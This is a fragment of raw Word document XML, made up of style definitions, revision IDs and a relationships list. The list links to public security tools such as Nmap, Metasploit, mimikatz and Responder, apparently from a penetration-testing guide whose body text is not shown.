    <w:rsid w:val="000C7432"/>
    <w:rsid w:val="000E2AB3"/>
    <w:rsid w:val="001215EC"/>
    <w:rsid w:val="00124941"/>
    <w:rsid w:val="001330E3"/>
    <w:rsid w:val="0013450B"/>
    <w:rsid w:val="0014334F"/>
    <w:rsid w:val="00183FB3"/>
    <w:rsid w:val="001911E4"/>
    <w:rsid w:val="001E55F8"/>
    <w:rsid w:val="0020271E"/>
    <w:rsid w:val="002076EB"/>
    <w:rsid w:val="002318B9"/>
    <w:rsid w:val="00244E22"/>
    <w:rsid w:val="00250115"/>
    <w:rsid w:val="002943DD"/>
    <w:rsid w:val="002C5863"/>
    <w:rsid w:val="002C6421"/>
    <w:rsid w:val="003035B6"/>
    <w:rsid w:val="00317DD7"/>
    <w:rsid w:val="0032484C"/>
    <w:rsid w:val="00335D96"/>
    <w:rsid w:val="00336FE0"/>
    <w:rsid w:val="00343A40"/>
    <w:rsid w:val="0034742C"/>
    <w:rsid w:val="003719FB"/>
    <w:rsid w:val="003C17E2"/>
    <w:rsid w:val="003C219B"/>
    <w:rsid w:val="003E04D1"/>
    <w:rsid w:val="00400385"/>
    <w:rsid w:val="0041691D"/>
    <w:rsid w:val="00450D41"/>
    <w:rsid w:val="00455A9D"/>
    <w:rsid w:val="00485B13"/>
    <w:rsid w:val="004956AA"/>
    <w:rsid w:val="004E111C"/>
    <w:rsid w:val="004F68CB"/>
    <w:rsid w:val="005264D0"/>
    <w:rsid w:val="0052786E"/>
    <w:rsid w:val="00542A1D"/>
    <w:rsid w:val="00547413"/>
    <w:rsid w:val="0055639E"/>
    <w:rsid w:val="0056593D"/>
    <w:rsid w:val="0058427B"/>
    <w:rsid w:val="005A6340"/>
    <w:rsid w:val="005D1352"/>
    <w:rsid w:val="005D3AC9"/>
    <w:rsid w:val="005E496E"/>
    <w:rsid w:val="0061682E"/>
    <w:rsid w:val="00646037"/>
    <w:rsid w:val="00663942"/>
    <w:rsid w:val="006903D1"/>
    <w:rsid w:val="006C5C9E"/>
    <w:rsid w:val="006E75C0"/>
    <w:rsid w:val="006F5E52"/>
    <w:rsid w:val="00707178"/>
    <w:rsid w:val="00727036"/>
    <w:rsid w:val="007B3BA5"/>
    <w:rsid w:val="007B579A"/>
    <w:rsid w:val="007B5BF7"/>
    <w:rsid w:val="007E1592"/>
    <w:rsid w:val="00884BFC"/>
    <w:rsid w:val="00884CD5"/>
    <w:rsid w:val="008C4153"/>
    <w:rsid w:val="008C4490"/>
    <w:rsid w:val="008C4B44"/>
    <w:rsid w:val="009A100A"/>
    <w:rsid w:val="009B0E35"/>
    <w:rsid w:val="00A154A9"/>
    <w:rsid w:val="00A23916"/>
    <w:rsid w:val="00A26E1B"/>
    <w:rsid w:val="00A34711"/>
    <w:rsid w:val="00A44D04"/>
    <w:rsid w:val="00AC67FD"/>
    <w:rsid w:val="00AE6477"/>
    <w:rsid w:val="00AF55AB"/>
    <w:rsid w:val="00AF642F"/>
    <w:rsid w:val="00B00365"/>
    <w:rsid w:val="00B0080A"/>
    <w:rsid w:val="00B2426F"/>
    <w:rsid w:val="00B35B88"/>
    <w:rsid w:val="00B40A5B"/>
    <w:rsid w:val="00B47DC6"/>
    <w:rsid w:val="00B51413"/>
    <w:rsid w:val="00B51483"/>
    <w:rsid w:val="00B920E2"/>
    <w:rsid w:val="00BA5F4C"/>
    <w:rsid w:val="00BF2359"/>
    <w:rsid w:val="00C0551F"/>
    <w:rsid w:val="00C30C78"/>
    <w:rsid w:val="00C32533"/>
    <w:rsid w:val="00C528B6"/>
    <w:rsid w:val="00C566FB"/>
    <w:rsid w:val="00CA4C6E"/>
    <w:rsid w:val="00CC110D"/>
    <w:rsid w:val="00D21F47"/>
    <w:rsid w:val="00D22A7D"/>
    <w:rsid w:val="00D36E2B"/>
    <w:rsid w:val="00D70417"/>
    <w:rsid w:val="00D847D3"/>
    <w:rsid w:val="00DA733E"/>
    <w:rsid w:val="00DA7649"/>
    <w:rsid w:val="00DD64D1"/>
    <w:rsid w:val="00E01DB7"/>
    <w:rsid w:val="00E03870"/>
    <w:rsid w:val="00E07CD2"/>
    <w:rsid w:val="00E34796"/>
    <w:rsid w:val="00E73F01"/>
    <w:rsid w:val="00EB2EDB"/>
    <w:rsid w:val="00EB4C33"/>
    <w:rsid w:val="00F351BE"/>
    <w:rsid w:val="00F62F5D"/>
    <w:rsid w:val="00F66181"/>
    <w:rsid w:val="00FD4229"/>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91A87"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF5ECA95-8233-4225-B058-76172603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0E2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D21F47"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="56018D"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="400069" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FD4229"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2A0046" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FD4229"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="400069" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00646037"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="400069"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47"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="56018D"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0061682E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="400069" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent2">
    <w:name w:val="Grid Table 4 Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="CAD5B2" w:themeColor="accent2" w:themeTint="99"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="CAD5B2" w:themeColor="accent2" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CAD5B2" w:themeColor="accent2" w:themeTint="99"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="CAD5B2" w:themeColor="accent2" w:themeTint="99"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CAD5B2" w:themeColor="accent2" w:themeTint="99"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="CAD5B2" w:themeColor="accent2" w:themeTint="99"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="A8B97F" w:themeColor="accent2"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="A8B97F" w:themeColor="accent2"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A8B97F" w:themeColor="accent2"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="A8B97F" w:themeColor="accent2"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="A8B97F" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="A8B97F" w:themeColor="accent2"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EDF1E5" w:themeFill="accent2" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EDF1E5" w:themeFill="accent2" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4">
    <w:name w:val="Grid Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="006168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61682E"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:rPr>
      <w:color w:val="2370CD" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD4229"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2A0046" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD4229"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="400069" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00663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592"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E34796"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C4B44"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ListTable4">
    <w:name w:val="List Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="005264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64D0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="A723FD" w:themeColor="accent1" w:themeTint="99"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="A723FD" w:themeColor="accent1" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A723FD" w:themeColor="accent1" w:themeTint="99"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="A723FD" w:themeColor="accent1" w:themeTint="99"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="A723FD" w:themeColor="accent1" w:themeTint="99"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="56018D" w:themeColor="accent1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="56018D" w:themeColor="accent1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="56018D" w:themeColor="accent1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="56018D" w:themeColor="accent1"/>
          <w:insideH w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="56018D" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="A723FD" w:themeColor="accent1" w:themeTint="99"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E1B5FE" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E1B5FE" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005264D0"/>
    <w:pPr>
      <w:spacing w:after="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000000" w:themeFill="text1"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E1B5FE" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00371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9FB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00371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9FB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00646037"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="400069" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="001215EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="001215EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00055045"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="omittedforbrevity">
    <w:name w:val="omitted for brevity"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="omittedforbrevityChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0070C0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Important">
    <w:name w:val="Important"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="ImportantChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="omittedforbrevityChar">
    <w:name w:val="omitted for brevity Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="omittedforbrevity"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BoxCode">
    <w:name w:val="Box Code"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="BoxCodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImportantChar">
    <w:name w:val="Important Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="Important"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BoxCodeChar">
    <w:name w:val="Box Code Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="BoxCode"/>
    <w:rsid w:val="003C219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92657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="42260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c/gau" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ParrotSec/mimikatz" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OJ/gobuster" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://builtwith.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/recon-ng/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ffuf/ffu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swigger.net/web-security/os-command-injection" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/crackmapexe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robertdavidgraham/masscan" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sullo/nikto" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpiderLabs/Responder" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 